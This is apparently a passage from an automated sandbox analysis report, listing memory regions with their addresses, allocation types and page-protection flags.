page read and write
|
||
|
540000
|
trusted library allocation
|
page read and write
|
||
|
35F2000
|
trusted library allocation
|
page read and write
|
||
|
274C0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
1B6C1B0D000
|
trusted library allocation
|
page read and write
|
||
|
26DE7000
|
trusted library allocation
|
page read and write
|
||
|
26DE0000
|
trusted library allocation
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
1CF476DF000
|
heap
|
page read and write
|
||
|
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF4766B000
|
heap
|
page read and write
|
||
|
24CF07B0000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
2669E000
|
trusted library allocation
|
page read and write
|
||
|
26848000
|
trusted library allocation
|
page read and write
|
||
|
8FAD000
|
stack
|
page read and write
|
||
|
1B6D9DE3000
|
heap
|
page read and write
|
||
|
8C50000
|
heap
|
page read and write
|
||
|
5A1A000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47870000
|
heap
|
page read and write
|
||
|
1CF477CD000
|
heap
|
page read and write
|
||
|
575000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
35C4000
|
trusted library allocation
|
page read and write
|
||
|
74C0000
|
direct allocation
|
page read and write
|
||
|
35D0000
|
trusted library allocation
|
page read and write
|
||
|
3351000
|
heap
|
page read and write
|
||
|
24CF0760000
|
heap
|
page read and write
|
||
|
1CF47795000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
3355000
|
heap
|
page read and write
|
||
|
5864000
|
trusted library allocation
|
page read and write
|
||
|
244D0000
|
trusted library allocation
|
page read and write
|
||
|
26690000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B941000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4780C000
|
heap
|
page read and write
|
||
|
3368000
|
heap
|
page read and write
|
||
|
24CF07B5000
|
heap
|
page read and write
|
||
|
3335000
|
heap
|
page read and write
|
||
|
1B6D9B36000
|
heap
|
page read and write
|
||
|
26DF0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47635000
|
heap
|
page read and write
|
||
|
24CF0640000
|
heap
|
page read and write
|
||
|
3B649FE000
|
stack
|
page read and write
|
||
|
7B63000
|
heap
|
page read and write
|
||
|
7FFD9B7AB000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47642000
|
heap
|
page read and write
|
||
|
800AC0F000
|
stack
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
26960000
|
heap
|
page read and write
|
||
|
25571000
|
trusted library allocation
|
page read and write
|
||
|
3239000
|
heap
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
27630000
|
trusted library allocation
|
page read and write
|
||
|
8C20000
|
trusted library allocation
|
page read and write
|
||
|
2698B000
|
heap
|
page read and write
|
||
|
1CF47630000
|
heap
|
page read and write
|
||
|
27650000
|
trusted library allocation
|
page read and write
|
||
|
1CF477DD000
|
heap
|
page read and write
|
||
|
7570000
|
direct allocation
|
page read and write
|
||
|
1CF4764D000
|
heap
|
page read and write
|
||
|
8B4C000
|
stack
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9DD4000
|
heap
|
page read and write
|
||
|
26E00000
|
trusted library allocation
|
page read and write
|
||
|
2442A000
|
stack
|
page read and write
|
||
|
24500000
|
heap
|
page read and write
|
||
|
E38D0FD000
|
stack
|
page read and write
|
||
|
1CF458A0000
|
heap
|
page read and write
|
||
|
26DF0000
|
trusted library allocation
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
3540000
|
heap
|
page read and write
|
||
|
8990000
|
trusted library allocation
|
page read and write
|
||
|
5686000
|
trusted library allocation
|
page read and write
|
||
|
2DEE000
|
unkown
|
page read and write
|
||
|
1CF477AF000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4589E000
|
heap
|
page read and write
|
||
|
25599000
|
trusted library allocation
|
page read and write
|
||
|
35A0000
|
trusted library section
|
page read and write
|
||
|
7E60000
|
trusted library allocation
|
page read and write
|
||
|
1CF47663000
|
heap
|
page read and write
|
||
|
5814000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4766F000
|
heap
|
page read and write
|
||
|
7510000
|
direct allocation
|
page read and write
|
||
|
562000
|
trusted library allocation
|
page read and write
|
||
|
4E6F000
|
stack
|
page read and write
|
||
|
26967000
|
heap
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
57B000
|
trusted library allocation
|
page execute and read and write
|
||
|
566000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF476BF000
|
heap
|
page read and write
|
||
|
1B6D9B8D000
|
heap
|
page read and write
|
||
|
269FC000
|
heap
|
page read and write
|
||
|
1B6D9DD1000
|
heap
|
page read and write
|
||
|
56A000
|
trusted library allocation
|
page execute and read and write
|
||
|
DCF4000
|
direct allocation
|
page execute and read and write
|
||
|
5A25000
|
trusted library allocation
|
page read and write
|
||
|
3C80000
|
remote allocation
|
page execute and read and write
|
||
|
7FFD9B94A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1D3F000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF458BD000
|
heap
|
page read and write
|
||
|
24CF0660000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF458F2000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1CF47780000
|
heap
|
page read and write
|
||
|
1CF4777B000
|
heap
|
page read and write
|
||
|
26E00000
|
trusted library allocation
|
page read and write
|
||
|
63BF000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFC55000
|
heap
|
page read and write
|
||
|
7B74000
|
heap
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
26DC1000
|
trusted library allocation
|
page read and write
|
||
|
1CF47676000
|
heap
|
page read and write
|
||
|
7620000
|
heap
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF458C7000
|
heap
|
page read and write
|
||
|
26E00000
|
trusted library allocation
|
page read and write
|
||
|
35C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF47633000
|
heap
|
page read and write
|
||
|
35D9000
|
trusted library allocation
|
page read and write
|
||
|
8CF0000
|
direct allocation
|
page read and write
|
||
|
7540000
|
direct allocation
|
page read and write
|
||
|
1CF458BD000
|
heap
|
page read and write
|
||
|
2426E000
|
stack
|
page read and write
|
||
|
8940000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
26BDE000
|
stack
|
page read and write
|
||
|
274C0000
|
trusted library allocation
|
page read and write
|
||
|
27640000
|
trusted library allocation
|
page read and write
|
||
|
243C0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
E38D2FF000
|
stack
|
page read and write
|
||
|
26DE0000
|
trusted library allocation
|
page read and write
|
||
|
8E3B000
|
heap
|
page read and write
|
||
|
2C3D000
|
stack
|
page read and write
|
||
|
8C0C000
|
stack
|
page read and write
|
||
|
364A000
|
heap
|
page read and write
|
||
|
1CF4777B000
|
heap
|
page read and write
|
||
|
1CF47626000
|
heap
|
page read and write
|
||
|
1CF47850000
|
remote allocation
|
page read and write
|
||
|
26DA3000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFB7E000
|
heap
|
page read and write
|
||
|
1CF47731000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1CF477C2000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
617B000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1500000
|
trusted library allocation
|
page read and write
|
||
|
7580000
|
direct allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B6BFC80000
|
heap
|
page read and write
|
||
|
245A6000
|
trusted library allocation
|
page read and write
|
||
|
26DA0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47683000
|
heap
|
page read and write
|
||
|
7FFD9B972000
|
trusted library allocation
|
page read and write
|
||
|
8F2E000
|
stack
|
page read and write
|
||
|
8009C7E000
|
stack
|
page read and write
|
||
|
6121000
|
trusted library allocation
|
page read and write
|
||
|
1CF47AC1000
|
heap
|
page read and write
|
||
|
26694000
|
trusted library allocation
|
page read and write
|
||
|
1CF4793E000
|
heap
|
page read and write
|
||
|
8009BFF000
|
stack
|
page read and write
|
||
|
26DE0000
|
trusted library allocation
|
page read and write
|
||
|
1CF47628000
|
heap
|
page read and write
|
||
|
244F0000
|
trusted library allocation
|
page read and write
|
||
|
8A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
24510000
|
remote allocation
|
page read and write
|
||
|
1CF477C2000
|
heap
|
page read and write
|
||
|
1B6BFBD8000
|
heap
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
1CF4780C000
|
heap
|
page read and write
|
||
|
A0F4000
|
direct allocation
|
page execute and read and write
|
||
|
32EF000
|
heap
|
page read and write
|
||
|
1CF47947000
|
heap
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
26DB0000
|
trusted library allocation
|
page read and write
|
||
|
1B6C1470000
|
trusted library allocation
|
page read and write
|
||
|
26DAD000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
C8F4000
|
direct allocation
|
page execute and read and write
|
||
|
5953000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1CF477DE000
|
heap
|
page read and write
|
||
|
1CF476DF000
|
heap
|
page read and write
|
||
|
244C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF47634000
|
heap
|
page read and write
|
||
|
35F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CF458E2000
|
heap
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page read and write
|
||
|
1CF47662000
|
heap
|
page read and write
|
||
|
E38D1FF000
|
unkown
|
page read and write
|
||
|
6544000
|
remote allocation
|
page execute and read and write
|
||
|
1B6D193D000
|
trusted library allocation
|
page read and write
|
||
|
1CF4767B000
|
heap
|
page read and write
|
||
|
3620000
|
heap
|
page readonly
|
||
|
1B6D9C26000
|
heap
|
page execute and read and write
|
||
|
1B6C33EB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
255D4000
|
trusted library allocation
|
page read and write
|
||
|
26E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
24520000
|
heap
|
page read and write
|
||
|
273C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
26DC0000
|
trusted library allocation
|
page read and write
|
||
|
26DD0000
|
trusted library allocation
|
page read and write
|
||
|
26D9E000
|
stack
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
1CF458AC000
|
heap
|
page read and write
|
||
|
8997000
|
trusted library allocation
|
page read and write
|
||
|
6139000
|
trusted library allocation
|
page read and write
|
||
|
50DF000
|
stack
|
page read and write
|
||
|
3B64FFD000
|
stack
|
page read and write
|
||
|
800977D000
|
stack
|
page read and write
|
||
|
1B6C1480000
|
heap
|
page readonly
|
||
|
1B6D9DB1000
|
heap
|
page read and write
|
||
|
7D1E000
|
stack
|
page read and write
|
||
|
1CF4589E000
|
heap
|
page read and write
|
||
|
24500000
|
trusted library allocation
|
page read and write
|
||
|
1B6D9A95000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
26840000
|
trusted library allocation
|
page read and write
|
||
|
8E57000
|
heap
|
page read and write
|
||
|
1B6C33F0000
|
trusted library allocation
|
page read and write
|
||
|
8C58000
|
heap
|
page read and write
|
||
|
74F0000
|
direct allocation
|
page read and write
|
||
|
1B6C2C83000
|
trusted library allocation
|
page read and write
|
||
|
8D10000
|
direct allocation
|
page read and write
|
||
|
1B6D9AB0000
|
heap
|
page read and write
|
||
|
269B9000
|
heap
|
page read and write
|
||
|
2420B000
|
stack
|
page read and write
|
||
|
8E50000
|
heap
|
page read and write
|
There are 860 hidden memdumps, click here to show them.